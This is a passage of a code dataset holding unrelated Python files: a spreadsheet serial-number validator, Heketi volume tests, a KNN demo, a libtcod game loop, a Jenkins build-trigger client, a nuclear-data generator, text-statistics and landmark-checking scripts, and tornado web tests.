'S-MPC-3D-16XGE-ADV-R', 'S-ACCT-JFLOW-IN-5G',\n 'WLA-ANTPROT-OUT', 'PWR-T-BUS-BAR-S', 'MX2K-DCCBLMGR-BB', 'MX2K-EMI-BTM-BB',\n 'FAN-REAR-TX-T640-BB', 'FANTRAY-M10i-S', 'S-MPC4E-3D-ADV-R', 'S-MPC4E-3D-ADV-IR', 'MCG-PPB-S', 'S-MX80-SSM-FP',\n 'S-NAT', 'S-SA-4K', 'S-SA-16K', 'S-MX104-UPG-4X10GE', 'S-SFW', 'S-MX104-ADV-R2', 'S-MX104-Q', 'FAN-REAR-TXP-LCC-BB']\n \n # exceptions_sku dictionary lists PNs that are just another names for respective base PNs such as Premium bundles that include some line cards and modules that base PN does not\n exceptions_sku = {\n 'NS-ISG-2000-SK1': 'NS-ISG-2000',\n 'MX240BASE-DC': 'MX240-PREMIUM2-DC',\n 'MX240BASE3-DC': 'MX240-PREMIUM3-DC',\n 'MX240BASE-AC-HIGH': 'MX240-PREMIUM2-AC-HIGH',\n 'MX480BASE-DC': 'MX480-PREMIUM2-DC',\n 'MX480BASE3-DC': 'MX480-PREMIUM3-DC',\n 'MX480BASE-AC': 'MX480-PREMIUM2-AC',\n 'MX480BASE3-AC': 'MX480-PREMIUM3-AC',\n 'MX960BASE3-DC': 'MX960-PREMIUM3-DC',\n 'MX960BASE3-AC': 'MX960-PREMIUM3-AC'\n }\n \n exceptions_material_status = ['Scrapped', 'Inactive', 'None']\n \n headers = {'Serial Number': 0,\n 'Material Id': 0,\n 'Material Status': 0,\n 'EOS Flag': 0}\n \n def get_header_indx(ib_header_list, headers):\n for k in headers.keys():\n i = 0\n for cell in ib_header_list:\n if cell == k:\n headers[k] = i\n break\n else: i += 1\n \n return headers\n \n # Finds line index in IB by SN and PN\n def find_line_in_ib(ib, headers, sn, pn):\n i = 0\n sn_index = get_header_indx(ib[0],headers)['Serial Number']\n pn_index = get_header_indx(ib[0],headers)['Material Id']\n while i < len(ib):\n if ib[i][sn_index] == sn and ib[i][pn_index] == pn:\n break\n elif i == (len(ib) - 1):\n i = 0\n break\n else: i += 1\n return i\n \n def IB_init(sheet):\n ib = []\n \n flag = True\n for row in sheet.rows:\n sn_line = []\n if flag:\n sn_line.append('DUP_FLAG')\n flag = False\n else:\n sn_line.append('')\n i = 0\n while i < len(row):\n if row[i].value == None or row[i].value == '': sn_line.append('None')\n else: sn_line.append(row[i].value)\n i += 1\n \n ib.append(sn_line)\n \n return ib\n \n # Returns an IB list with indication of duplicated SNs\n def mark_duplicates(ib, headers, exceptions_no_SN):\n sn_dict = {} #sn_dict contains unique combinations of SNs and PNs\n duplicates = {}\n sn_pn_confusion = []\n material_status_issues = []\n \n sn_index = get_header_indx(ib[0],headers)['Serial Number']\n pn_index = get_header_indx(ib[0],headers)['Material Id']\n item_status_index = get_header_indx(ib[0],headers)['Material Status']\n \n i = 0\n while i < len(ib):\n\n sn = ib[i][sn_index]\n pn = ib[i][pn_index]\n item_status = ib[i][item_status_index]\n\n if item_status not in exceptions_material_status:\n if pn not in exceptions_no_SN:\n if (sn, pn) not in sn_dict.items():\n if sn not in sn_dict.keys(): sn_dict[sn] = pn\n else:\n n = find_line_in_ib(ib, headers, sn, sn_dict[sn])\n sn_pn_confusion.append(ib[n])\n sn_pn_confusion.append(ib[i])\n elif (sn, pn) not in duplicates.items():\n ib[i][0] = 'DUPLICATE'\n n = find_line_in_ib(ib, headers, sn, pn)\n ib[n][0] = 'duplicated'\n duplicates[sn] = pn\n else:\n ib[i][0] = 'DUPLICATE'\n else: material_status_issues.append(ib[i])\n \n i += 1\n \n unique_sn_pn_pairs = len(sn_dict) \n print('\\nTotal number of unique SN-PN pairs is: {}\\n'.format(unique_sn_pn_pairs))\n \n return ib, sn_pn_confusion, material_status_issues\n\n def sn_pn_confusion_cleanup_all(sn_pn_confusion, headers, exceptions_sku):\n l = list(sn_pn_confusion)\n for line in sn_pn_confusion:\n sn = line[headers['Serial Number']]\n pn = line[headers['Material Id']]\n if pn in exceptions_sku.keys():\n cur = find_line_in_ib(l, headers, sn, pn)\n nxt = find_line_in_ib(l, headers, sn, exceptions_sku[pn])\n if nxt:\n if nxt > cur:\n print('nxt > cur which is expected')\n del(l[nxt])\n del(l[cur])\n else:\n #print('cur > nxt')\n del(l[cur])\n del(l[nxt])\n #else:\n # print(sn)\n # print(pn)\n \n return l\n \n \n #===============================================MAIN================================================\n \n IB = IB_init(sheet)\n del(sheet)\n headers = get_header_indx(IB[0],headers)\n IB, SN_PN_confusion, Material_Status_Issues = mark_duplicates(IB, headers, exceptions_no_SN)\n \n # ==============================================OUTPUT============================================== \n # import Workbook\n from openpyxl import Workbook\n # create Workbook object\n wb = Workbook()\n # set file path\n filepath = out_file\n # activate .xlsx\n sheet = wb.active\n \n # Create, intialize and populate data into the new sheet \"Duplicated SNs\"\n sheet.title = 'Duplicated SNs'\n sheet.append(IB[0])\n sheet.auto_filter.ref = \"A:BE\"\n sheet.freeze_panes = 'A2'\n IB_dup_list = []\n for line in IB:\n if line[0] == 'duplicated' or line[0] == 'DUPLICATE':\n IB_dup_list.append(line)\n \n for line in IB_dup_list:\n sheet.append(line)\n \n # Create, intialize and populate data into the new sheet \"SN to PN double mapping\"\n wb.create_sheet(title = 'SN to PN double mapping')\n sheet = wb['SN to PN double mapping']\n sheet.append(IB[0])\n sheet.auto_filter.ref = \"A:BE\"\n sheet.freeze_panes = 'A2'\n SN_PN_confusion = sn_pn_confusion_cleanup_all(SN_PN_confusion, headers, exceptions_sku)\n for line in SN_PN_confusion:\n sheet.append(line)\n \n # Create, intialize and populate data into the new sheet \"Material Status Issues\"\n wb.create_sheet(title = 'Material Status Issues')\n sheet = wb['Material Status Issues']\n sheet.append(IB[0])\n sheet.auto_filter.ref = \"A:BE\"\n sheet.freeze_panes = 'A2'\n for line in Material_Status_Issues:\n sheet.append(line)\n\n # Create, intialize and populate data into the new sheet \"EoS Report\"\n wb.create_sheet(title = 'EoS Report')\n sheet = wb['EoS Report']\n sheet.append(IB[0])\n sheet.auto_filter.ref = \"A:BE\"\n sheet.freeze_panes = 'A2'\n eos_index = get_header_indx(IB[0],headers)['EOS Flag']\n for line in IB:\n if line[eos_index] == 'Y':\n sheet.append(line)\n \n # save file\n wb.save(filepath)\n\nif __name__ == '__main__': main()\n\n#=======================END OF SCRIPT====================================\n","sub_path":"IB_validation_v1.2.py","file_name":"IB_validation_v1.2.py","file_ext":"py","file_size_in_byte":9902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"643857209","text":"from cnslibs.common.heketi_ops import (heketi_volume_delete,\n heketi_volume_create,\n heketi_volume_expand,\n heketi_volume_info)\nfrom cnslibs.common.baseclass import BaseClass\n\n\nclass TestHeketiVolumeOperations(BaseClass):\n \"\"\"\n Class to test heketi volume operations - create, expand\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(TestHeketiVolumeOperations, cls).setUpClass()\n cls.volume_size = 1\n\n def test_heketi_with_default_options(self):\n \"\"\"\n Test to create volume with default options.\n \"\"\"\n\n vol_info = heketi_volume_create(self.heketi_client_node,\n self.heketi_server_url,\n self.volume_size, json=True)\n self.assertTrue(vol_info, (\"Failed to create heketi volume of size %s\"\n % self.volume_size))\n self.addCleanup(\n heketi_volume_delete,\n self.heketi_client_node, self.heketi_server_url, vol_info['id'])\n\n self.assertEqual(vol_info['size'], self.volume_size,\n (\"Failed to create volume with default options.\"\n \"Expected Size: %s, Actual Size: %s\"\n % (self.volume_size, vol_info['size'])))\n\n def test_heketi_with_expand_volume(self):\n \"\"\"\n Test volume expand and size if updated correctly in heketi-cli info\n \"\"\"\n\n vol_info = heketi_volume_create(self.heketi_client_node,\n self.heketi_server_url,\n self.volume_size, json=True)\n self.assertTrue(vol_info, (\"Failed to create heketi volume of size %s\"\n % self.volume_size))\n self.addCleanup(\n heketi_volume_delete,\n self.heketi_client_node, self.heketi_server_url, vol_info['id'])\n self.assertEqual(vol_info['size'], self.volume_size,\n (\"Failed to create volume.\"\n \"Expected Size: %s, Actual Size: %s\"\n % (self.volume_size, vol_info['size'])))\n volume_id = vol_info[\"id\"]\n expand_size = 2\n ret = heketi_volume_expand(self.heketi_client_node,\n self.heketi_server_url, volume_id,\n expand_size)\n self.assertTrue(ret, (\"Failed to expand heketi volume of id %s\"\n % volume_id))\n volume_info = heketi_volume_info(self.heketi_client_node,\n self.heketi_server_url,\n volume_id, json=True)\n expected_size = self.volume_size + expand_size\n self.assertEqual(volume_info['size'], expected_size,\n (\"Volume Expansion failed Expected Size: %s, Actual \"\n \"Size: %s\" % (str(expected_size),\n str(volume_info['size']))))\n","sub_path":"tests/functional/heketi/test_heketi_volume_operations.py","file_name":"test_heketi_volume_operations.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37804054","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 3 16:59:17 2018\n\n@author: suliang\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# 导入数据\ncenters = np.array([[-2,2],[2,2],[0,4]])\nX,y = make_blobs(n_samples=120, centers=centers,random_state=0, cluster_std=0.60)\n\n# 设置KNN算法参数\nk = 5\nclf = KNeighborsClassifier(n_neighbors=k)\nclf.fit(X,y)\nprint('classifier score is: {}'.format(clf.score(X,y)))\n\n# 获取近邻点:获得的是近邻点的横坐标坐标标签\nX_sample = [[0,2]] # 要求传入一个2维数据,2维list或者array都可以\ny_sample = clf.predict(X_sample) # 预测\nneighbors = clf.kneighbors(X_sample, return_distance=False) # 获得k个近邻点\n\n# 可视化\nplt.figure(figsize=(8,5),dpi=80)\nplt.scatter(X[:,0],X[:,1],c='y',s=100,cmap='cool') # 画样本点\nplt.scatter(centers[:,0],centers[:,1],c='r',s=100,marker='^') # 画中心点\nplt.scatter(X_sample[0][0],X_sample[0][1],c='r',s=100,marker='x') # 画新样本点\n# 画新样本X_sample跟k个近邻点的连线\nfor i in neighbors[0]: # 绘制每个样本点与近邻的连线\n plt.plot([X[i][0],X_sample[0][0]], [X[i][1], X_sample[0][1]], 'k--', linewidth = 0.6)\n\n# KNN距离加权算法\nclf_dis = KNeighborsClassifier(n_neighbors=k, weights = 'distance')\n# KNN半径取代距离最近\nclf_rad = KNeighborsClassifier(n_neighbors=k, radius = 200.0) \n\n","sub_path":"KNN/KNN_sklearn_clf.py","file_name":"KNN_sklearn_clf.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569262040","text":"import libtcodpy as tcod\n\nclass Game:\n current_map = None\n\n fov_recompute = True\n\n is_running = False\n\n player = None\n\n screen_width = 0\n screen_height = 0\n\n turn = 0\n\n @classmethod\n def handle_keys(cls):\n if Game.player is None:\n return 0\n\n turns_elapsed = 0\n\n key = tcod.console_wait_for_keypress(True)\n\n if key.vk == tcod.KEY_F11:\n tcod.console_set_fullscreen(not tcod.console_is_fullscreen)\n\n if key.vk == tcod.KEY_ESCAPE:\n Game.is_running = False\n return 0\n\n move_x = 0\n move_y = 0\n if (\n key.vk == tcod.KEY_KP1 or\n key.vk == tcod.KEY_KP2 or\n key.vk == tcod.KEY_KP3\n ):\n move_y += 1\n elif (\n key.vk == tcod.KEY_KP7 or\n key.vk == tcod.KEY_KP8 or\n key.vk == tcod.KEY_KP9\n ):\n move_y -= 1\n\n if (\n key.vk == tcod.KEY_KP3 or\n key.vk == tcod.KEY_KP6 or\n key.vk == tcod.KEY_KP9\n ):\n move_x += 1\n elif (\n key.vk == tcod.KEY_KP1 or\n key.vk == tcod.KEY_KP4 or\n key.vk == tcod.KEY_KP7\n ):\n move_x -= 1\n\n if move_x != 0 or move_y != 0:\n Game.fov_recompute = True\n Game.player.move(move_x, move_y)\n turns_elapsed = 1\n\n return turns_elapsed\n\n @classmethod\n def init(cls, screen_width, screen_height, window_title, full_screen):\n FONT_PATH = 'font/consolas12x12_gs_tc.png'\n FONT_FLAGS = tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD\n tcod.console_set_custom_font(FONT_PATH, FONT_FLAGS)\n\n print(\"Initializing game window\")\n\n tcod.console_init_root(screen_width, screen_height, window_title,\n full_screen)\n Game.con = tcod.console_new(screen_width, screen_height)\n\n Game.screen_width = screen_width\n Game.screen_height = screen_height\n\n @classmethod\n def update(cls):\n if Game.current_map is None:\n return\n\n Game.current_map.draw(Game.con, Game.player)\n # for o in Game.objects:\n # o.draw(Game.con)\n\n width = Game.screen_width\n height = Game.screen_height\n tcod.console_blit(Game.con, 0, 0, width, height, 0, 0, 0)\n\n tcod.console_flush()\n\n Game.current_map.clear(Game.con)\n # for o in Game.objects:\n # o.clear(Game.con)\n\n turns_elapsed = Game.handle_keys()\n for i in range(turns_elapsed):\n Game.current_map.update()\n Game.turn += 1\n print(f\"Turn: {Game.turn}\")\n\n @classmethod\n def run(cls):\n Game.is_running = True\n\n print(\"Entering game loop\")\n while not tcod.console_is_window_closed() and Game.is_running:\n Game.update()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497440504","text":"\"\"\"Utilities for interacting with the Jenkins CI API.\"\"\"\n\nimport json\nimport logging\nfrom urllib.error import HTTPError\nfrom urllib.parse import (quote, urlencode)\nfrom urllib.request import urlopen\n\nfrom reviewboard.hostingsvcs.service import HostingServiceHTTPRequest\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass JenkinsAPI(object):\n \"\"\"Object for interacting with the Jenkins CI API.\"\"\"\n\n def __init__(self, endpoint, job_name, username, password):\n \"\"\"Initialize the object.\n\n Args:\n endpoint (unicode):\n Jenkins server endpoint.\n\n job_name (unicode):\n Job name on Jenkins.\n\n username (unicode):\n Jenkins username.\n\n password (unicode):\n Jenkins password.\n \"\"\"\n self.endpoint = endpoint\n self.job_name = job_name\n self.username = username\n self.password = password\n self.csrf_protection_enabled = True\n self.crumb = None\n self.crumb_request_field = None\n\n def test_connection(self):\n \"\"\"Test the connection to the Jenkins server.\n\n This is used for verifying both the URL and user credentials are\n correct.\n \"\"\"\n self._make_request('%s/api/json?pretty=true' % self.endpoint,\n method='GET')\n\n def start_build(self, patch_info):\n \"\"\"Start a build.\n\n Args:\n patch_info (dict):\n Contains the review ID, review branch, review diff revision\n and the status update ID.\n\n Raises:\n urllib2.URLError:\n The HTTP request failed.\n \"\"\"\n data = {\n 'parameter': [\n {\n 'name': 'REVIEWBOARD_SERVER',\n 'value': patch_info['reviewboard_server']\n },\n {\n 'name': 'REVIEWBOARD_REVIEW_ID',\n 'value': patch_info['review_id']\n },\n {\n 'name': 'REVIEWBOARD_REVIEW_BRANCH',\n 'value': patch_info['review_branch']\n },\n {\n 'name': 'REVIEWBOARD_DIFF_REVISION',\n 'value': patch_info['diff_revision']\n },\n {\n 'name': 'REVIEWBOARD_STATUS_UPDATE_ID',\n 'value': patch_info['status_update_id']\n }\n ]\n }\n\n # This is not part of the official REST API, but is however listed in\n # the Jenkins wiki as the correct way to initiate a remote build.\n #\n # This method of passing in the build parameters may change in the\n # future.\n self._make_request(\n '%s/job/%s/build' % (self.endpoint,\n quote(self.job_name)),\n body=urlencode({\n 'json': json.dumps(data, sort_keys=True)\n }),\n content_type='application/x-www-form-urlencoded',\n method='POST'\n )\n\n def _fetch_csrf_token(self):\n \"\"\"Fetches a CSRF token from the Jenkins server.\n\n This is required for making requests to API endpoints when using basic\n authentication. A crumb is no longer required when using API token\n authentication to access buildWithParameters.\n \"\"\"\n data = self._make_raw_request('%s/crumbIssuer/api/json'\n % self.endpoint)\n\n result = json.loads(data)\n\n self.crumb = result['crumb']\n self.crumb_request_field = result['crumbRequestField']\n\n def _make_request(self, url, body=None, method='GET',\n content_type=''):\n \"\"\"Make an HTTP request.\n\n This will first attempt to fetch a CSRF token if we do not currently\n have one.\n\n Args:\n url (unicode):\n The URL to make the request against.\n\n body (unicode or bytes, optional):\n The content of the request.\n\n method (unicode, optional):\n The request method. If not provided, it defaults to a ``GET``\n request.\n\n content_type (unicode, optional):\n The type of the content being POSTed.\n\n Returns:\n bytes:\n The contents of the HTTP response body.\n\n Raises:\n urllib2.URLError:\n The HTTP request failed.\n \"\"\"\n if self.csrf_protection_enabled and not self.crumb:\n try:\n self._fetch_csrf_token()\n except HTTPError as e:\n if e.code == 404:\n self.csrf_protection_enabled = False\n else:\n raise e\n\n return self._make_raw_request(url, body, method, content_type)\n\n def _make_raw_request(self, url, body=None, method='GET',\n content_type=''):\n \"\"\"Make an HTTP request.\n\n Args:\n url (unicode):\n The URL to make the request against.\n\n body (unicode or bytes, optional):\n The content of the request.\n\n method (unicode, optional):\n The request method. If not provided, it defaults to a ``GET``\n request.\n\n content_type (unicode, optional):\n The type of the content being POSTed.\n\n Returns:\n bytes:\n The contents of the HTTP response body.\n\n Raises:\n urllib2.URLError:\n The HTTP request failed.\n \"\"\"\n logger.debug('Making request to Jenkins CI %s', url)\n\n headers = {}\n\n if self.crumb:\n headers[self.crumb_request_field] = self.crumb\n\n if content_type:\n headers['Content-Type'] = content_type\n\n if isinstance(body, str):\n body = body.encode('utf-8')\n\n request = HostingServiceHTTPRequest(\n url,\n body=body,\n method=method,\n headers=headers)\n request.add_basic_auth(self.username, self.password)\n\n return self._open_request(request)\n\n def _open_request(self, request):\n \"\"\"Perform an HTTP request.\n\n Args:\n request (reviewboard.hostingsvcs.service.\n HostingServiceHTTPRequest):\n The HTTP request object.\n\n Returns:\n bytes:\n The response data.\n \"\"\"\n response = request.open()\n return response.data\n","sub_path":"rbintegrations/jenkinsci/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"392097079","text":"#! /bin/env python\n\n# <>\n# Copyright (c) 2016, Lawrence Livermore National Security, LLC.\n# Produced at the Lawrence Livermore National Laboratory.\n# Written by the LLNL Nuclear Data and Theory group\n# (email: mattoon1@llnl.gov)\n# LLNL-CODE-683960.\n# All rights reserved.\n# \n# This file is part of the FUDGE package (For Updating Data and \n# Generating Evaluations)\n# \n# When citing FUDGE, please use the following reference:\n# C.M. Mattoon, B.R. Beck, N.R. Patel, N.C. Summers, G.W. Hedstrom, D.A. Brown, \"Generalized Nuclear Data: A New Structure (with Supporting Infrastructure) for Handling Nuclear Data\", Nuclear Data Sheets, Volume 113, Issue 12, December 2012, Pages 3145-3171, ISSN 0090-3752, http://dx.doi.org/10. 1016/j.nds.2012.11.008\n# \n# \n# Please also read this link - Our Notice and Modified BSD License\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the disclaimer below.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the disclaimer (as noted below) in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of LLNS/LLNL nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific\n# prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL SECURITY, LLC,\n# THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# \n# \n# Additional BSD Notice\n# \n# 1. This notice is required to be provided under our contract with the U.S.\n# Department of Energy (DOE). This work was produced at Lawrence Livermore\n# National Laboratory under Contract No. DE-AC52-07NA27344 with the DOE.\n# \n# 2. Neither the United States Government nor Lawrence Livermore National Security,\n# LLC nor any of their employees, makes any warranty, express or implied, or assumes\n# any liability or responsibility for the accuracy, completeness, or usefulness of any\n# information, apparatus, product, or process disclosed, or represents that its use\n# would not infringe privately-owned rights.\n# \n# 3. Also, reference herein to any specific commercial products, process, or services\n# by trade name, trademark, manufacturer or otherwise does not necessarily constitute\n# or imply its endorsement, recommendation, or favoring by the United States Government\n# or Lawrence Livermore National Security, LLC. The views and opinions of authors expressed\n# herein do not necessarily state or reflect those of the United States Government or\n# Lawrence Livermore National Security, LLC, and shall not be used for advertising or\n# product endorsement purposes.\n# \n# <>\n\nimport sys, math\n\nyi = int( sys.argv[1] )\nZA = int( sys.argv[2] )\nworkDir = sys.argv[3]\n\nfrom fudge.legacy.endl import bdfls\nendl_bdfls = bdfls.getDefaultBdfls ( template = '/usr/gapps/data/nuclear/bdfls.archive/bdfls.Audi_etal.2003.12.22')\nfrom fudge.legacy import endl\n\ndef xSec( Es, z1, m1, z2, m2 ) :\n\n if( z2 == 0 ) : z2 = 1e-10\n m = ( m1 + m2 ) / m2\n C = 2.07323e-2 * math.pi / 2 * z1 * z1 * z2 * z2 * m * m * 16.16666667\n xsecs = []\n for E in Es : xsecs.append( [ E, C / E / E ] )\n return( xsecs )\n\nnumber, EMin, EMax = 200, 1e-4, 30\nfrac = math.pow( EMax / EMin, 1. / number )\nenergies = [ EMin * math.pow( frac, i1 ) for i1 in range( number ) ]\nenergies.append( EMax )\n\nangularStr = \"\"\"-1.00000e+00 1.53490e-02\n -8.21610e-01 1.85030e-02\n -6.65520e-01 2.21340e-02\n -5.20570e-01 2.65540e-02\n -3.97930e-01 3.14180e-02\n -2.86440e-01 3.71000e-02\n -1.86090e-01 4.36430e-02\n -1.88510e-02 5.91470e-02\n 1.26090e-01 8.03940e-02\n 2.37590e-01 1.05630e-01\n 3.37930e-01 1.40070e-01\n 4.15980e-01 1.80010e-01\n 4.94020e-01 2.39820e-01\n 5.49770e-01 3.02890e-01\n 5.94370e-01 3.73150e-01\n 6.38970e-01 4.71030e-01\n 6.72410e-01 5.72140e-01\n 7.05860e-01 7.09630e-01\n 7.39310e-01 9.03460e-01\n 7.61610e-01 1.08040e+00\n 7.83910e-01 1.31480e+00\n 8.06210e-01 1.63480e+00\n 8.28510e-01 2.08760e+00\n 8.39660e-01 2.38810e+00\n 8.61950e-01 3.22180e+00\n 8.73100e-01 3.81280e+00\n 8.84250e-01 4.58280e+00\n 8.95400e-01 5.61180e+00\n 9.06550e-01 7.03060e+00\n 9.17700e-01 9.06470e+00\n 9.28850e-01 1.21280e+01\n 9.39900e-01 1.69980e+01\n 9.40000e-01 0.00000e+00\n 1.00000e+00 0.00000e+00\"\"\"\n\nproject = endl.endlProject( projectile = yi, workDir = workDir )\ntarget = project.addZA( ZA )\n\nhalflife = endl_bdfls.halflife( ZA )\nif( halflife is None ) : # Happens when bdfls file does not have halflife for ZA.\n ZA_halflife = target.ZA\n if( target.ZA % 1000 == 0 ) : ZA_halflife = 0\n halflife = { 0 : 1e50, 99120 : 1e50, 99125 : 1e50, 24047 : 0.5, 28067 : 27., 30073 : 23.5 }[ZA_halflife]\n\nxSecData = xSec( energies, project.Z, project.mass, target.Z, endl_bdfls.mass( target.ZA ) )\nfileI0 = target.addFile( 0, 8, 0, 0 )\nfileI0.addData( xSecData, halflife = halflife )\n\nangularData = angularStr.split( '\\n' )\nangularData = [ map( float, line.split( ) ) for line in angularData ]\nangularData = [ [ EMin, angularData ], [ EMax, angularData ] ]\nfileI1 = target.addFile( yi, 8, 1, 0 )\nfileI1.addData( angularData, halflife = halflife )\n\nproject.save( )\n","sub_path":"fudge/legacy/endl/largeAngleCoulombScattering_generator.py","file_name":"largeAngleCoulombScattering_generator.py","file_ext":"py","file_size_in_byte":6281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"560880801","text":"import pandas as pd\nfrom nltk.corpus import stopwords\n\n# Stopwords\nstop = stopwords.words('english')\n\n# Claps into float\ndef mod_claps(claps):\n if claps[-1] == 'K':\n claps = float(claps[0:-1])*1000\n else:\n claps = float(claps)\n return(claps)\n\n# Average word length\ndef avg_word(sentence):\n words = sentence.split()\n return (sum(len(word) for word in words)/len(words))\n\n# Count of claps on each link\ndef claps_count(link_1, claps_1, link_2, claps_2):\n for i in range(len(link_1)):\n link = link_1[i]\n claps_1[i] = 0\n for j in range(len(link_2)):\n if link == link_2[j]:\n claps_1[i] = claps_1[i] + claps_2[j]\n return(claps_1)\n\n# Read origanal CSV\ndata = pd.read_csv('./datasets/mod_articles.csv', engine = 'python', encoding = 'utf-8')\n\n# Create new CSV with info about origanal CSV\ninfo_data = pd.DataFrame(columns = ['author', 'title', 'reading_time', 'claps', 'link', 'word_count', 'stopwords_count', 'avg_word', 'num_count'], index = range(len(data)))\n\n# Author\ninfo_data['author'] = data['author']\n# Title\ninfo_data['title'] = data['title']\n# Reading Time\ninfo_data['reading_time'] = data['reading_time']\n# Claps\ninfo_data['claps'] = data['claps'].apply(lambda x: mod_claps(x))\n# Link\ninfo_data['link'] = data['link'].apply(lambda x: str(x)[8::].split('/')[0])\n# Number of Words\ninfo_data['word_count'] = data['text'].apply(lambda x: len(str(x).split(\" \"))) \n# Number of stopwords\ninfo_data['stopwords_count'] = data['text'].apply(lambda x: len([x for x in x.split() if x in stop])) \n# Average Word Length\ninfo_data['avg_word'] = data['text'].apply(lambda x: avg_word(x)) \n# Number of numerics\ninfo_data['num_count'] = data['text'].apply(lambda x: len([x for x in x.split() if x.isdigit()]))\n\n# info_data to new CSV\ninfo_data.to_csv('./datasets/info_data.csv')\n\n# Links count\nlink_freq = pd.Series(' '.join(info_data['link']).split()).value_counts()\n\n# Create new CSV with info about links\nlink_data = pd.DataFrame(columns = ['link', 'link_count', 'claps_count'], index = range(len(link_freq)))\n\n# Links\nlink_data['link'] = link_freq.index\n# Count of link\nlink_data['link_count'] = link_freq.data\n# Count of claps\nlink_data['claps_count'] = claps_count(link_data['link'], link_data['claps_count'], info_data['link'], info_data['claps'])\n\nlink_data.to_csv('./datasets/link_data.csv')","sub_path":"text_pp_scripts/01_info_link_data.py","file_name":"01_info_link_data.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171096887","text":"from attr import attributes\nimport cv2\nimport numpy as np\n\ndef draw_landmarks(image, landmarks):\n sample_image = image.copy()\n sample_landmarks = list(landmarks.copy())\n\n for (x, y) in sample_landmarks:\n cv2.circle(sample_image, (int(x), int(y)), radius=1, color=(0, 0, 255), thickness=-1)\n\n sample_image = cv2.resize(sample_image, (640, 480))\n cv2.imshow(\"sample_image\", sample_image)\n cv2.waitKey(0)\n\n\ndef check_data(data):\n image_path = data[0]\n labels = data[1:]\n\n image = cv2.imread(image_path)\n height, width = image.shape[:2]\n\n landmarks = np.array(labels[:196], np.float32).reshape(-1, 2)\n attributes = np.array(labels[196:202], np.float32)\n euler_angles = np.array(labels[202:], np.float32)\n \n print(image_path)\n draw_landmarks(image, landmarks * height)\n\n\nif __name__ == \"__main__\":\n data_list = \"/data/Datasets/WFLW/test_data_98pts/list.txt\"\n f = open(data_list, \"r\")\n lines = f.readlines()\n\n for line in lines:\n line = line.strip().split()\n check_data(line)","sub_path":"source/face_landmark/PFLD/data/98pts/dataset_check.py","file_name":"dataset_check.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"210749832","text":"import json\nimport pytest\nimport tornado.ioloop\nimport util.net\nimport pool.proc\nimport web\n\ndef test_non_2XX_codes():\n async def handler(req):\n 1 / 0\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n resp = web.get_sync(url)\n assert '1 / 0' not in resp['body']\n assert resp['code'] == 500\n\ndef test_normal_app():\n async def handler(req):\n return {'body': 'asdf'}\n port = util.net.free_port()\n web.app([('/', {'get': handler})]).listen(port)\n proc = pool.proc.new(tornado.ioloop.IOLoop.current().start)\n url = f'http://0.0.0.0:{port}'\n assert web.get_sync(url)['body'] == 'asdf'\n proc.terminate()\n\ndef test_get_timeout():\n async def handler(req):\n if 'sleep' in req['query']:\n await tornado.gen.sleep(1)\n handler._sleep = True\n return {}\n async def main(url):\n await web.get(url + '?sleep', timeout=.001)\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n with pytest.raises(web.Timeout):\n tornado.ioloop.IOLoop.instance().run_sync(lambda: main(url))\n\ndef test_get():\n async def handler(req):\n return {'body': 'ok',\n 'code': 200,\n 'headers': {'foo': 'bar'}}\n async def main(url):\n resp = await web.get(url)\n assert resp['body'] == 'ok'\n assert resp['code'] == 200\n assert resp['headers']['foo'] == 'bar'\n app = web.app([('/', {'get': handler})])\n with web.test(app) as url:\n 